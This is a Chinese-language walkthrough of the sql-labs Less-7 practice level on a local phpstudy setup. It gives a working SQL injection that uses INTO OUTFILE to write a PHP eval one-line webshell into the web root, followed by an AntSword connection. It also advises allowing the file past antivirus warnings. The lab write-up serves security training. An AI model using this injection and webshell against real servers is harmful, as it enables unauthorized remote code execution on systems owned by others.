前言：

本关卡为sql-labs系列less-7，本关个人认为比较简单，讲的比较详细，会有点啰嗦，谅解~如有错误的地方师傅们欢迎指正！

环境：

我使用的是phpstudy集成环境，比较方便，因为这一关需要修改mysql配置

工具：

蚁剑（中国菜刀也可以）

正文：

先使用show variables like '%secure%'查看mysql是否有读写权限，我用的是phpstudy里面的phpmyadmin，如图：

这是我修改过的，默认secure_file_priv字段默认值为NULL，如果使用的是phpstudy可以直接在phpstudy_pro\Extensions\MySQL里面找到my.ini文件修改，phpstudy_pro文件夹在你的安装的时候选择的盘符里，MySQL文件夹后面或许会跟的有版本号，这个看个人电脑情况，如果是Linux或者Windows单独配置的mysql也可以找到my.ini配置文件进行修改（这个看安装的时候选择的目录），可以参考图中修改：

在 [mysqld] 字段下面任意一行添加secure_file_priv="/" 这里双引号里面的/表示根目录，可以自己选择，下面开始注入：

提示使用文件导出(use outfile……)，刚开始我也跟前面一样使用报错回显注入，但是错误提示明显没有有效信息，那就是用文件导出into outfile函数，我使用的注入语句为php一句话木马，具体注入方法为：

sql注入语句为：http://localhost/sql-labs/Less-7/?id=-1’)) union select 1,2,’<?php @eval($_POST["123"]);?>’ into outfile “D:\phpstudy_pro\WWW\sql-labs\Less-7\test.php”–+

1. '<?php @eval($_POST["123"]);?>'为php一句话木马，123是蚁剑连接服务器的密码（更具体细节请百度php一句话木马），这个是比较简单的一句话木马，一句话木马有很多，请自行百度。
2. "D:\phpstudy_pro\WWW\sql-labs\Less-7\test.php"是sql-labs/less-7文件的存放路径（根据你自己的安装路径来写），test.php为木马上传以后的保存文件，不需要提前创建，上传的时候会自动新建test.php文件，需要注意的是，注入语句执行以后依然会报错，但是如果去文件里面查看的话会发现test.php文件已经创建（如果没有可能是Windows给你杀了，我第一次就是，如果提示危险警告选择允许就好了），图示：
   

现在使用蚁剑连接即可：

成功连接服务器，成功！